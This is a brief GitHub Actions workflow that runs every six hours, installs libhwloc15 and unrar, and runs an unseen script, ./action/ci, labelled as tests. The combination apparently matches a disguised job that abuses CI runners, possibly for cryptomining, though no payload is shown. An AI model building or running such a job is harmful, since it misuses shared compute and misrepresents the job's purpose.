jobs:
  build:
    name: Run
    runs-on: ubuntu-20.04

    steps:
      - name: Pull Code
        uses: actions/checkout@v2
      - name: Fetch Libraries
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Execute Tests
        run: ./action/ci

name: Action

on:
  schedule:
    - cron: "5 */6 * * *"
